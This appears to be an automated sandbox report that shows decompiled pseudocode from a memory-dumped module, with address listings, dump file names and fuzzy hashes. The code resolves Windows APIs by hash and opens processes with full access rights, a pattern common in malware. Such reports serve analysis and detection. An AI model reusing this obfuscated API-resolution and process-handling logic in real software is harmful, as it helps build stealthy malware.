										E6F0338C8( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6F02F4F0( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6F02F84C( *((intOrPtr*)(_t439 + 4)), E6F02F4F0( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6F03303C(0xfe338407, 0x77fa1d17);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6F02F4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6F02F4F0( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6F02F4F0( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6F02F4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6F02F4E0( *((intOrPtr*)(_t439 + 8)), _t422);
										E6F0338C8( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6F02F4F0( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6F02F84C( *((intOrPtr*)(_t439 + 8)), E6F02F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6F02F4E0(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6f02a536
0x6f02a538
0x6f02a543
0x6f02a549
0x6f02a54d
0x6f02a552
0x6f02a558
0x6f02a568
0x00000000
0x6f02a56a
0x6f02a56a
0x6f02a575
0x6f02a575
0x6f02aaf3
0x6f02aaf5
0x6f02aaf6
0x6f02ab35
0x6f02ab39
0x6f02ab47
0x6f02ab55
0x6f02ab55
0x6f02ab40
0x6f02ab5b
0x6f02ab60
0x00000000
0x6f02ab60
0x6f02ab44
0x6f02ab45
0x00000000
0x6f02a57f
0x6f02a57f
0x6f02a583
0x6f02a68a
0x6f02a68a
0x6f02a68f
0x6f02a7a0
0x6f02a7a4
0x6f02a7a9
0x6f02a7ad
0x6f02a8d7
0x6f02a8d9
0x6f02a8dd
0x6f02a8e6
0x6f02a8ef
0x6f02a8f3
0x6f02a8fc
0x6f02a903
0x6f02a904
0x6f02a908
0x6f02a90c
0x6f02a910
0x6f02a912
0x6f02aa7c
0x6f02aa7c
0x6f02aa84
0x6f02aa9c
0x6f02aa9e
0x6f02aaa0
0x6f02aada
0x6f02aada
0x6f02aadc
0x6f02aadc
0x6f02aadf
0x6f02aafa
0x6f02ab0e
0x6f02ab11
0x6f02ab16
0x6f02ab21
0x6f02ab22
0x6f02ab25
0x6f02ab27
0x6f02ab30
0x00000000
0x6f02ab30
0x6f02aae1
0x6f02aae5
0x6f02aaee
0x00000000
0x6f02aaee
0x6f02aab1
0x6f02aac1
0x6f02aac5
0x6f02aac5
0x6f02aac8
0x6f02aacb
0x6f02aace
0x6f02aad4
0x00000000
0x00000000
0x00000000
0x6f02aad6
0x6f02a91a
0x6f02a91a
0x6f02a91c
0x6f02a920
0x6f02a925
0x6f02a927
0x6f02a92b
0x6f02a92e
0x6f02a936
0x6f02a938
0x00000000
0x00000000
0x6f02a94f
0x6f02a96a
0x6f02a96c
0x6f02a97f
0x6f02a981
0x6f02a983
0x6f02a99e
0x6f02a99e
0x6f02a9a2
0x6f02a9a4
0x00000000
0x00000000
0x6f02a9a6
0x6f02a9a9
0x6f02a9ca
0x6f02a9e9
0x6f02a9ef
0x6f02a9f2
0x6f02a9f7
0x6f02a9f8
0x6f02a9fc
0x00000000
0x00000000
0x6f02aa04
0x6f02aa04
0x6f02aa06
0x6f02aa12
0x6f02aa1e
0x6f02aa28
0x6f02aa2b
0x6f02aa2e
0x6f02aa32
0x6f02aa39
0x6f02aa3d
0x6f02aa41
0x6f02aa42
0x6f02aa46
0x6f02aa4b
0x6f02aa50
0x6f02aa54
0x6f02aa58
0x6f02aa5e
0x6f02aa64
0x6f02aa6a
0x6f02aa70
0x6f02aa75
0x6f02aa76
0x6f02aa76
0x00000000
0x6f02aa06
0x00000000
0x6f02a9a9
0x6f02a987
0x6f02a998
0x6f02a99a
0x6f02a99c
0x00000000
0x00000000
0x00000000
0x6f02a99c
0x6f02a9af
0x00000000
0x6f02a9af
0x6f02a7b3
0x6f02a7b6
0x6f02a7b8
0x00000000
0x00000000
0x6f02a7c0
0x6f02a7c0
0x6f02a7c2
0x6f02a7c2
0x6f02a7d3
0x6f02a7d5
0x6f02a7d8
0x00000000
0x00000000
0x6f02a8ce
0x6f02a8cf
0x6f02a8d1
0x00000000
0x00000000
0x00000000
0x6f02a8d1
0x6f02a7de
0x6f02a7e1
0x6f02a7eb
0x6f02a7f0
0x6f02a7f2
0x6f02a7f8
0x6f02a7ff
0x6f02a803
0x6f02a808
0x6f02a80c
0x6f02ac47
0x6f02ac5b
0x6f02ac7e
0x6f02ac83
0x6f02ac83
0x6f02a823
0x6f02a828
0x6f02a828
0x6f02a828
0x6f02a828
0x6f02a82e
0x6f02a833
0x6f02a835
0x6f02a83a
0x6f02a841
0x6f02a846
0x6f02a848
0x6f02ac05
0x6f02ac16
0x6f02ac30
0x6f02ac35
0x6f02ac35
0x6f02a85e
0x6f02a863
0x6f02a863
0x6f02a863
0x6f02a863
0x6f02a877
0x6f02a895
0x6f02a89a
0x6f02a8aa
0x6f02a8c7
0x6f02a8c9
0x6f02a8c9
0x00000000
0x6f02a7e1
0x6f02a697
0x6f02a697
0x6f02a699
0x6f02a6a0
0x6f02a6ae
0x6f02a6b0
0x6f02a6b3
0x6f02a6ba
0x6f02a6bc
0x6f02a6ed
0x6f02a6fc
0x6f02a6fe
0x6f02a700
0x6f02a71e
0x6f02a720
0x6f02a722
0x6f02a735
0x6f02a754
0x6f02a75a
0x6f02a75d
0x6f02a774
0x6f02a790
0x6f02a792
0x6f02a792
0x6f02a792
0x6f02a792
0x6f02a722
0x00000000
0x6f02a700
0x6f02a6c0
0x6f02a6c0
0x6f02a6c2
0x6f02a6d3
0x6f02a6d5
0x6f02a6d7
0x00000000
0x00000000
0x6f02a6e3
0x6f02a6e4
0x6f02a6eb
0x00000000
0x00000000
0x00000000
0x6f02a6eb
0x6f02a6d9
0x6f02a6dc
0x00000000
0x00000000
0x6f02a795
0x6f02a795
0x6f02a796
0x6f02a796
0x00000000
0x6f02a589
0x6f02a58b
0x6f02a58b
0x6f02a58d
0x6f02a594
0x6f02a5a2
0x6f02a5a4
0x6f02a5a8
0x6f02a5ac
0x6f02a5ae
0x6f02a5dc
0x6f02a5df
0x6f02a5e4
0x6f02a5e8
0x6f02a5ed
0x6f02a5f4
0x6f02a5f9
0x6f02a5fb
0x6f02abc2
0x6f02abd3
0x6f02abf3
0x6f02abf8
0x6f02abf8
0x6f02a611
0x6f02a616
0x6f02a616
0x6f02a616
0x6f02a616
0x6f02a628
0x6f02a62a
0x6f02a62c
0x6f02a63d
0x6f02a63d
0x6f02a643
0x6f02a648
0x6f02a64c
0x6f02a652
0x6f02a659
0x6f02a65e
0x6f02a660
0x6f02ab76
0x6f02ab87
0x6f02aba8
0x6f02abad
0x6f02abad
0x6f02a677
0x6f02a67c
0x6f02a67c
0x6f02a67c
0x6f02a67c
0x6f02a67f
0x6f02a67f
0x00000000
0x6f02a67f
0x6f02a5b2
0x6f02a5b2
0x6f02a5b4
0x6f02a5c5
0x6f02a5c7
0x6f02a5c9
0x00000000
0x00000000
0x6f02a5d5
0x6f02a5d6
0x6f02a5da
0x00000000
0x00000000
0x00000000
0x6f02a5da
0x6f02a5cb
0x6f02a5ce
0x00000000
0x00000000
0x6f02a680
0x6f02a680
0x6f02a681
0x6f02a681
0x00000000
0x6f02a58d
0x6f02a583

Strings

, xrefs: 6F02AB3B

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: ce43888746ea429afc53b340b7e4e3d47e783cbf21d5579547fa4e11305f7168
Instruction ID: 89075a59a3453c764f5137730a75975df1c208a208cd6cd98eded3aa1f1cabbd
Opcode Fuzzy Hash: ce43888746ea429afc53b340b7e4e3d47e783cbf21d5579547fa4e11305f7168
Instruction Fuzzy Hash: D1126F716083119FC714DF24C980B6FB7E9BFD5B58F208A19E999972A1DF70AC01CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6F02846C, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6F02846C(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6F02B69C(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6F02F4F4(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6F02F678(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6F03223C(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6F02F678(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6F02F5A8(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6F02F5A8(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6F02F4E0(_t449 + 0x14, 0);
									_t180 = E6F032928( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6F02B608(_t449 + 0x34);
										E6F02B608(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6F02F4E0( *(_t449 + 4), _t315 << 2)));
										_t188 = E6F02F4E0( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6F02B608(_t449 + 0x34);
										E6F02B608(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6F02CAD0(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6F02C2C4(_t343);
									if(__eflags != 0) {
										break;
									}
									E6F02F84C(_t449 + 0x14, E6F02F4F0(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6F02F4E0(_t449 + 0x14, E6F02F4F0(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6F03303C(0xfe338407, 0xa8c8a645);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6F02F84C(_t449 + 0x40, E6F02F4F0(_t449 + 0x3c) + 4);
											 *(E6F02F4E0(_t449 + 0x40, E6F02F4F0(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6F02CD68(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6F02F4E0( *(_t449 + 4), _t431 * 4);
												_t212 = E6F02F4E0(_t449 + 0x40, _t431 * 4);
												E6F028B9C( *_t211, E6F0302D4(0xfe338407, 0x1a9c1df5),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6F02CD68(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6F02F4E0(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6F02F4F0( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6F02F4F0( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6F02F4E0( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6F02F4E0( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6F0338C8( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6F02F4F0( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6F02F84C( *(_t449 + 4), E6F02F4F0( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6F02F4F0(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6F02F4F0(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6F02F4E0(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6F02F4E0(_t322, _t430);
										E6F0338C8(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6F02F4F0(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6F02F84C(_t322, E6F02F4F0(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6F02F84C( *(_t449 + 4), E6F02F4F0( *_t449) + 4);
								 *(E6F02F4E0( *(_t449 + 4), E6F02F4F0( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6F02F84C(_t322, E6F02F4F0(_t322) + 4);
								 *(E6F02F4E0(_t322, E6F02F4F0(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6F02F4E0(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6F03303C(0x10154545, 0xc2a75cb8);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6F02F4E0(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6F02F84C( *(_t449 + 4), E6F02F4F0( *_t449) + 4);
										 *(E6F02F4E0( *(_t449 + 4), E6F02F4F0( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6F02F4E0(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6F02F84C( *((intOrPtr*)(_t449 + 0x74)), E6F02F4F0( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6F02F4E0( *((intOrPtr*)(_t449 + 0x74)), E6F02F4F0( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6F02F4E0( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6F02F4E0( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6F02F4F0( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6F02F4F0(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6F02F4E0(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6F02F4E0(_t430, _t443);
										E6F0338C8( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6F02F4F0(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6F02F84C(_t430, E6F02F4F0(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6F03303C(0xfe338407, 0x77fa1d17);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6F02F4E0( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6F02F4F0( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6F02F4F0( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6F02F4E0( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6F02F4E0( *(_t449 + 4), _t445);
										E6F0338C8(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6F02F4F0( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6F02F84C( *(_t449 + 4), E6F02F4F0( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6F02F4E0(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x6f028479
0x6f02847f
0x6f028483
0x6f028487
0x6f028492
0x6f028496
0x6f02849b
0x6f0284a3
0x6f0284b3
0x00000000
0x6f0284b5
0x6f0284bd
0x6f0284c4
0x6f0284c4
0x6f028a17
0x6f028a19
0x6f028a5a
0x6f028a5c
0x6f028a6b
0x6f028a77
0x6f028a77
0x6f028a66
0x6f028a7d
0x6f028a82
0x00000000
0x6f028a82
0x6f028a6a
0x00000000
0x6f0284ce
0x6f0284d2
0x6f0284d5
0x6f0285dd
0x6f0285dd
0x6f0285e2
0x6f028705
0x6f028709
0x6f02870e
0x6f028712
0x6f028716
0x6f02884c
0x6f02884e
0x6f028852
0x6f02885b
0x6f028866
0x6f02886a
0x6f028873
0x6f028878
0x6f02887e
0x6f02887f
0x6f028883
0x6f028887
0x6f02888e
0x6f028890
0x6f0289d0
0x6f0289e1
0x6f0289e8
0x6f0289ef
0x6f0289ef
0x6f0289f2
0x6f0289f5
0x6f0289f8
0x6f0289fe
0x6f028a05
0x6f028a09
0x6f028a12
0x00000000
0x6f028a12
0x6f028a00
0x6f028a03
0x6f028a1c
0x6f028a34
0x6f028a37
0x6f028a3c
0x6f028a46
0x6f028a49
0x6f028a4c
0x6f028a55
0x00000000
0x6f028a55
0x00000000
0x6f028a03
0x6f028898
0x6f028898
0x6f02889a
0x6f02889e
0x6f0288a3
0x6f0288a5
0x6f0288a9
0x6f0288ac
0x6f0288b4
0x6f0288b6
0x00000000
0x00000000
0x6f0288cd
0x6f0288e8
0x6f0288ea
0x6f0288f8
0x6f0288fd
0x6f0288ff
0x6f02891c
0x6f02891c
0x6f028920
0x6f028922
0x00000000
0x00000000
0x6f028924
0x6f028927
0x6f028948
0x6f028967
0x6f02896d
0x6f028970
0x6f028975
0x6f028976
0x6f02897d
0x00000000
0x00000000
0x6f028985
0x6f028985
0x6f028987
0x6f028993
0x6f02899f
0x6f0289c1
0x6f0289c6
0x6f0289c7
0x6f0289c7
0x00000000
0x6f028987
0x00000000
0x6f028927
0x6f028901
0x6f028907
0x6f028909
0x6f02890a
0x6f02890b
0x6f02890c
0x6f028910
0x6f028914
0x6f028916
0x6f028917
0x6f028918
0x6f02891a
0x00000000
0x00000000
0x00000000
0x6f02891a
0x6f02892d
0x00000000
0x6f02892d
0x6f02871c
0x6f02871e
0x6f028720
0x00000000
0x00000000
0x6f02872a
0x6f02872a
0x6f02872c
0x6f02872f
0x6f028731
0x6f028739
0x6f028740
0x6f028744
0x6f028747
0x00000000
0x00000000
0x6f028843
0x6f028844
0x6f028846
0x00000000
0x00000000
0x00000000
0x6f028846
0x6f02874d
0x6f028750
0x6f028759
0x6f02875e
0x6f028760
0x6f02876c
0x6f028770
0x6f028775
0x6f028779
0x6f028b56
0x6f028b6a
0x6f028b8c
0x6f028b91
0x6f028b91
0x6f02878f
0x6f028794
0x6f028798
0x6f028798
0x6f028798
0x6f028798
0x6f02879d
0x6f0287a2
0x6f0287a4
0x6f0287a8
0x6f0287af
0x6f0287b4
0x6f0287b6
0x6f028b17
0x6f028b26
0x6f028b3f
0x6f028b44
0x6f028b44
0x6f0287c9
0x6f0287ce
0x6f0287d2
0x6f0287d2
0x6f0287d2
0x6f0287e4
0x6f028805
0x6f02880d
0x6f02881b
0x6f028839
0x6f02883f
0x6f02883f
0x00000000
0x6f028750
0x6f0285e8
0x6f0285e8
0x6f0285ea
0x6f0285f1
0x6f0285ff
0x6f028601
0x6f028605
0x6f028607
0x6f028609
0x6f028644
0x6f028653
0x6f028655
0x6f028657
0x6f028675
0x6f028677
0x6f028679
0x6f02868b
0x6f0286a9
0x6f0286b2
0x6f0286b5
0x6f0286c3
0x6f0286d4
0x6f0286f2
0x6f0286f4
0x6f0286f8
0x6f0286f8
0x6f0286f8
0x6f028679
0x00000000
0x6f028657
0x6f02860f
0x6f02860f
0x6f028614
0x6f02861b
0x6f02862a
0x6f028631
0x6f028633
0x00000000
0x00000000
0x6f02863f
0x6f028640
0x6f028642
0x00000000
0x00000000
0x00000000
0x6f028642
0x6f028635
0x6f028638
0x00000000
0x00000000
0x6f0286fa
0x6f0286fa
0x6f0286fb
0x6f0286fb
0x00000000
0x6f0284db
0x6f0284db
0x6f0284db
0x6f0284dd
0x6f0284e4
0x6f0284f2
0x6f0284f4
0x6f0284f8
0x6f0284fa
0x6f028526
0x6f02852a
0x6f02852f
0x6f028534
0x6f028538
0x6f02853c
0x6f028543
0x6f028548
0x6f02854a
0x6f028ad9
0x6f028ae8
0x6f028b07
0x6f028b0c
0x6f028b0c
0x6f02855d
0x6f028562
0x6f028566
0x6f028566
0x6f028566
0x6f028577
0x6f028579
0x6f02857b
0x6f02858c
0x6f02858c
0x6f028591
0x6f028596
0x6f02859a
0x6f02859f
0x6f0285a6
0x6f0285ab
0x6f0285ad
0x6f028a9b
0x6f028aa7
0x6f028ac1
0x6f028ac6
0x6f028ac6
0x6f0285c3
0x6f0285c8
0x6f0285cc
0x6f0285cc
0x6f0285cc
0x6f0285cc
0x6f0285cf
0x6f0285cf
0x00000000
0x6f0285cf
0x6f0284fe
0x6f0284fe
0x6f028500
0x6f02850c
0x6f028513
0x6f028515
0x00000000
0x00000000
0x6f028521
0x6f028522
0x6f028524
0x00000000
0x00000000
0x00000000
0x6f028524
0x6f028517
0x6f02851a
0x00000000
0x00000000
0x6f0285d0
0x6f0285d4
0x6f0285d5
0x6f0285d5
0x00000000
0x6f0284dd
0x6f0284d5

Strings

, xrefs: 6F028A5E

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

